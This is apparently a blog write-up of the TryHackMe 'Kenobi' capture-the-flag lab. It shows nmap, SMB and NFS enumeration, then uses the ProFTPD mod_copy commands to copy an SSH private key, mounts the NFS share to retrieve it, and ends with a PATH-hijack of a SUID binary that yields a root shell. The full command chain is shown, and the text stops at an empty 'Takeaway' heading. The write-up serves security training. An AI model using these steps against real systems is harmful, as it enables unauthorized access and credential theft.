My Computer

17 object(s)
 

Kenobi

Kenobi is the third machine in TryHackMe’s “Offensive pentesting” path.


Enumeration

Starting with nmap scan:

nmap -sC -sV 10.10.232.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 06:43 EDT
Nmap scan report for 10.10.232.217
Host is up (0.042s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      36449/tcp   mountd
|   100005  1,2,3      39549/tcp6  mountd
|   100005  1,2,3      48915/udp   mountd
|   100005  1,2,3      51195/udp6  mountd
|   100021  1,3,4      34801/tcp6  nlockmgr
|   100021  1,3,4      38033/tcp   nlockmgr
|   100021  1,3,4      56194/udp6  nlockmgr
|   100021  1,3,4      56722/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-10-09T05:43:51-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-10-09T10:43:51
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds

So we have Samba on this machine. Samba is the standard Windows interoperability suite of programs for Linux and Unix. Let’s enumerate it more close with NSE scripts of nmap:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.232.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 07:04 EDT
Nmap scan report for 10.10.232.217
Host is up (0.086s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.232.217\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.232.217\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.232.217\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds

Let’s connect to the \\10.10.232.217\anonymous share:

smbclient //10.10.232.217/anonymous

or you can use smbget to download the share:

smbget -R smb://10.10.232.217/anonymous

The only one file is there. By opening this file we can learn that id_rsa file can be found at /home/kenobi/.ssh/id_rsa.
Let’s more closely look on the FTP server now. Nmap is highlighted that the ProFTPD 1.3.5 is running on port 21.
If search for the available exploits, we can find a few:

searchsploit ProFTPD 1.3.5
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)|         linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution|         linux/remote/36803.py
ProFTPd 1.3.5 - File Copy|         linux/remote/36742.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

The version is matched, and we can see that mod_copy one even have the Metasploit module. But we don’t really need it. Let’s read the exploit and the official documentation instead. We can learn from it that the mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files on the machine. We also the rpcbind running on the port 111, let’s enumerate it too:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.232.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 06:42 EDT
Nmap scan report for 10.10.232.217
Host is up (0.046s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds                                                          

Great. Now we know that it’s possible to mount /var folder on the machine and we potentially have a way to copy some files to it.


Exploitation

Connect to the port 21 with the nc and try to use mod_copy commands:

nc 10.10.232.217 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.232.217]
SITE CPFR /home/kenobi/.id_rsa
550 /home/kenobi/.id_rsa: No such file or directory
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

Awesome, we’re now have SSH key in the /var folder. Let’s mount it and grab it:

sudo mkdir /mnt/kenobiNFS
sudo mount 10.10.232.217:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Oct  9 06:45 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Oct  9 06:34 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www

Now we should try to use this SSH key, as we know the user name too. Copy the SSH key to some folder, and add the chmod 600 to it:

cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.232.217

kenobi@kenobi:~$ whoami
kenobi

PrivEsc

All the “standard” enumeration scripts will pick that up, but it’s good to know how to do things by hands.
The following command can locate all the files with SUID bit (means that they will be executed with the root permissions):

find / -perm -u=s -type f 2>/dev/null

By reviewing the output we can say that /usr/bin/menu is standing out a bit. You can use the command strings to examine the binary:

kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

It’s quite messy, but don’t worry. Just read it line by line and try to make sense of it. If you will try to run the binary you will see the following:

1. status check
2. kernel version
3. ifconfig
** Enter your choice :

In the strings output we have this chunk of code right after it:

curl -I localhost
uname -r
ifconfig

Noticed that it’s calling the curl without specifying the absolute path? That should ring the bell for you, as this is our way in. To move forward you need to understand how $PATH in Linux works. That might be a good reading. Let’s do the trick:

kenobi@kenobi:/tmp$ echo /bin/bash > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# whoami
root

Hooray! We have a root shell!

Take a second to understand what we did here. We created a file named curl with a string /bin/bash in it. We exported the /tmp folder into the $PATH variable, do the /usr/bin/menu will start to look for a binary named curl in it first. Let’s check the $PATH to make sure:

kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

As the /usr/bin/menu is not specified the absolute path of the binary curl, it will start looking for it in each location from the $PATH. /tmp, /home/kenobi/bin, /home/kenobi/.local/bin, etc. As we have our “fake” curl inside of the first folder, and the /usr/bin/menu is executing with the root privileges, we get the root shell.


Takeaway